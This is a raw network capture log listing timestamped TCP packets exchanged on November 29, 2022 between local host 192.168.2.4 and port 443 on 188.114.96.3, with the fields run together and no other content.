                                  Nov 29, 2022 16:56:46.053875923 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.053898096 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.053930044 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.053952932 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.054613113 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.054678917 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.055337906 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.055399895 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.055401087 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.055417061 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.055453062 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.056214094 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.056293964 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.057023048 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.057106018 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.057260036 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.057337999 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.058008909 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.058087111 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.058196068 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.058253050 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.058866024 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.058943987 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.059159994 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.059223890 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.059243917 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.059267044 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.059330940 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.059340954 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.059382915 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.060051918 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.060118914 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.060851097 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.060909986 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.060931921 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.060950994 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.060971022 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.061011076 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.061019897 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.061043024 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.065241098 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.065273046 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.065346956 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.065372944 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.065397978 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.065435886 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.066466093 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.066535950 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.066592932 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.066605091 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.066644907 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.067329884 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.067353964 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.067384958 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.067405939 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.067421913 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.067477942 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.068744898 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.068770885 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.068855047 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.068873882 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.068895102 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.068917036 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.069763899 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.069797039 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.069886923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.069906950 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.069922924 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.070015907 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.071525097 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.071557045 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.071640015 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.071660995 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.071680069 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.071708918 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.072525978 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.072559118 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.072617054 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.072633982 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.072662115 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.072681904 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.078031063 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.078099012 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.078124046 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.078161955 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.078185081 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.078218937 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.078984976 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.079011917 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.079135895 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.079137087 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.079157114 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.079294920 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.079868078 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.079890966 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.079969883 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.079988003 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.080034018 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.081614017 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.081646919 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.081711054 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.081728935 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.081759930 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.081782103 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.081939936 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.081960917 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.082000017 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.082011938 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.082041979 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.082067013 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.082753897 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.082797050 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.082870960 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.082897902 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.082945108 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.083723068 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.083750010 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.083822966 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.083841085 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.083873034 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.083897114 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.084695101 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.084722996 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.084781885 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.084798098 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.084830046 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.084849119 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.097661972 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.097697973 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.097763062 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.097790956 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.097810030 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.097837925 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.097929001 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.097975969 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.098086119 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.098102093 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.098187923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.098187923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.098622084 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.098653078 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.098795891 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.098815918 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.098884106 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.099229097 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099251032 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099315882 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.099332094 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099358082 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.099427938 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.099597931 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099623919 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099687099 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.099701881 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.099761963 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.100354910 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.100375891 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.100433111 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.100449085 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.100476980 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.100516081 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.101047993 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101066113 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101134062 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.101150990 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101197004 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.101469994 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101489067 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101547003 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.101562023 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.101607084 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.102206945 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.102226019 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.102293015 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.102308989 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.102355957 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.102900982 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.102925062 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.102987051 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.103003979 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.103050947 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116147041 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116178989 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116298914 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116322994 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116477013 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116477013 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116691113 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116717100 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116772890 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116787910 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.116801977 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.116833925 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.117172003 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117191076 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117260933 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.117275953 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117341995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.117743969 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117760897 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117820978 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.117835999 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.117862940 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.117885113 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.118299007 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.118318081 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.118382931 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.118396997 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.118436098 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.118457079 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.118927956 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.118947983 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.119030952 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.119048119 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.119098902 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125190973 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125228882 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125288963 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125303030 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125319958 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125346899 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125346899 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125381947 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125391006 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125412941 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125432014 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.125958920 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.125982046 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126066923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126084089 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126108885 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126133919 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126457930 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126482010 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126548052 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126566887 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126585960 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126619101 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126658916 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126682997 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126759052 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.126769066 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.126813889 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.127484083 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127509117 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127578020 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.127594948 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127623081 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.127643108 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.127667904 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127690077 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127758026 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.127767086 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.127810955 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.128398895 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128422022 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128499031 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.128515959 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128575087 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.128755093 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128793955 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128837109 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.128850937 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.128876925 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.128896952 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129513025 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129553080 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129621029 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129637003 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129663944 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129688978 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129722118 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129765987 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129805088 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129813910 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.129839897 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.129862070 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.130636930 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.130678892 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.130734921 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.130754948 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.130789995 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.130806923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.130965948 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.131004095 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.131073952 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.131088018 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.131135941 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147440910 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147517920 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147625923 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147646904 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147671938 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147681952 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147720098 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147731066 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147763968 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147784948 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147814035 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147820950 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.147965908 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147965908 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.147994995 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148046017 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148101091 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148112059 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148124933 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148138046 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148189068 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148195982 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148214102 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148226976 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148256063 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148753881 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148792982 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148847103 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148863077 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148886919 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148895025 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148924112 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.148930073 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148947001 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.148972988 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.149003029 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.149671078 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.149728060 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.149789095 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.149804115 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.149835110 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.149849892 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150042057 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150078058 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150151968 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150170088 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150185108 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150213957 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150684118 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150721073 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150798082 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150815010 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150835991 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150923014 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.150948048 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.150990963 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.151010990 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.151087046 CET49701443192.168.2.4188.114.96.3
                                  Nov 29, 2022 16:56:46.151099920 CET44349701188.114.96.3192.168.2.4
                                  Nov 29, 2022 16:56:46.151170969 CET49701443192.168.2.4188.114.96.3
